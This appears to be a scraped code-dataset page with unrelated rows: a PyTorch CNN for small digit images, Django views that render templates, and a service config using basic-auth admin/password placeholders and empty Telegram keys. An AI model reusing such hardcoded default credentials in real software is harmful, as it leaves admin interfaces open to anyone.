        """Conv2d(stride=1, padding=0, bias=True), optionally followed by ReLU.

        Factored out because every block in the original repeated the same
        seven-line Conv2d+ReLU boilerplate; the produced modules (and hence
        state_dict keys and forward behavior) are identical.
        """
        layers = [nn.Conv2d(in_channels=in_channels,
                            out_channels=out_channels,
                            kernel_size=kernel_size,
                            stride=1,
                            padding=0,
                            bias=True)]
        if relu:
            layers.append(nn.ReLU())
        return nn.Sequential(*layers)

    def __init__(self):
        super(Net, self).__init__()
        # FIRST LAYER
        self.conv_block_1 = self._conv(1, 4, 3)    # out 26, RF 3
        # CONVOLUTION BLOCK
        self.conv_block_2 = self._conv(4, 8, 3)    # out 24, RF 5
        self.conv_block_3 = self._conv(8, 16, 3)   # out 22, RF 7
        # TRANSITION BLOCK
        self.pool_1 = nn.MaxPool2d(kernel_size=2, stride=2, padding=0)  # out 11, RF 8
        self.conv_block_4 = self._conv(16, 4, 1)   # 1x1 squeeze: out 11, RF 10
        # CONVOLUTION BLOCK
        self.conv_block_5 = self._conv(4, 8, 3)    # out 9, RF 14
        self.conv_block_6 = self._conv(8, 16, 3)   # out 7, RF 18
        # OUTPUT LAYER
        self.conv_block_7 = self._conv(16, 10, 1)  # out 7, RF 20
        self.conv_block_8 = self._conv(10, 10, 7, relu=False)  # out 1, RF 26

    def forward(self, x):
        """Return per-class log-probabilities of shape (batch, 10)."""
        x = self.conv_block_1(x)
        x = self.conv_block_2(x)
        x = self.conv_block_3(x)
        x = self.pool_1(x)
        x = self.conv_block_4(x)
        x = self.conv_block_5(x)
        x = self.conv_block_6(x)
        x = self.conv_block_7(x)
        x = self.conv_block_8(x)
        x = x.view(-1, 10)
        return F.log_softmax(x, dim=-1)
|
23,598 | 5da68f28a2cfc5321fd4fa318f52f42a2241df75 | from django.shortcuts import render
# Create your views here.
def dom(request):
    """Render the DOM demo page."""
    template_name = 'dom/dom.html'
    return render(request, template_name)
def showBig(request):
    """Render the enlarged-image page."""
    template_name = 'dom/showBig.html'
    return render(request, template_name)
def main(request):
    """Render the main page."""
    template_name = 'dom/main.html'
    return render(request, template_name)
def history(request):
    """Render the history page.

    Fixes the misspelled parameter name ('reqeust'); Django passes the
    request positionally, so URL-dispatched callers are unaffected.
    """
    return render(request, 'dom/history.html')
# Basic-auth credentials for the service's admin interface.
# NOTE(review): these are placeholder values — replace before deploying.
AUTH_USERNAME='admin'
AUTH_PASSWORD='password'
# Public domain the service is reachable at.
DOMAIN='yourdomain.com'
# Path to the SQLite database file.
DB_FILE='/opt/blinder.db'
# Telegram bot credentials for notifications — presumably optional when
# left empty; confirm in the consuming code.
TELEGRAM_KEY=''
TELEGRAM_CHAT_ID=''
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.